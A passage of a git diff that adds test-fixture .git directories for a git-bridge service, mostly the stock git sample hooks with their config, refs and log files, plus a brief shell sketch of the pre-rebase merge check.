test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. 
+ else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". 
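
Check (2) can be exercised the same way. Again this is only a sketch under the same assumption of branches named "master" and "topic" as in the notes above.

    #!/bin/sh
    # Sketch of check (2): is "topic" fully merged to "master"?
    # The branch names are assumptions taken from the sample above.
    if test -z "$(git rev-list master..topic)"
    then
        echo "topic is fully merged to master and can be deleted"
    else
        echo "topic still has commits that are not in master"
    fi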
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." 
>&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) 
+ echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/index new file mode 100644 index 0000000..06891a6 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/HEAD new file mode 100644 index 0000000..a82c298 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/HEAD @@ -0,0 +1,2 @@ +0000000000000000000000000000000000000000 4a64431a59519ff25eff2cd94a561081146059b7 Winston Li <git@winston.li> 1475933347 +0100 commit (initial): Initial commit +4a64431a59519ff25eff2cd94a561081146059b7 71ebe5d70c8634f7531cc09c1cad5dae951a9052 Winston Li <git@winston.li> 1475933399 +0100 commit: Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..a82c298 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/refs/heads/master @@ -0,0 +1,2 @@ +0000000000000000000000000000000000000000 4a64431a59519ff25eff2cd94a561081146059b7 Winston Li <git@winston.li> 1475933347 +0100 commit (initial): Initial commit +4a64431a59519ff25eff2cd94a561081146059b7 71ebe5d70c8634f7531cc09c1cad5dae951a9052 Winston Li <git@winston.li> 1475933399 +0100 commit: Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a new file mode 100644 index 0000000..72a979b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a differ diff --git 
a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 new file mode 100644 index 0000000..fddf852 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 new file mode 100644 index 0000000..f58821d Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 new file mode 100644 index 0000000..e7279a2 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 new file mode 100644 index 0000000..5678b62 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 new file mode 100644 index 0000000..7112238 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/refs/heads/master new file mode 100644 index 0000000..60f255a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/refs/heads/master @@ -0,0 +1 @@ +71ebe5d70c8634f7531cc09c1cad5dae951a9052 diff --git 
a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/file1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/file1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/file2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/file2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/.gitignore new file mode 100644 index 0000000..5545880 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/.gitignore @@ -0,0 +1,2 @@ +*.ignored + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..217e7d6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. 
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". 
+ +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. 
+exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? 
+git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly 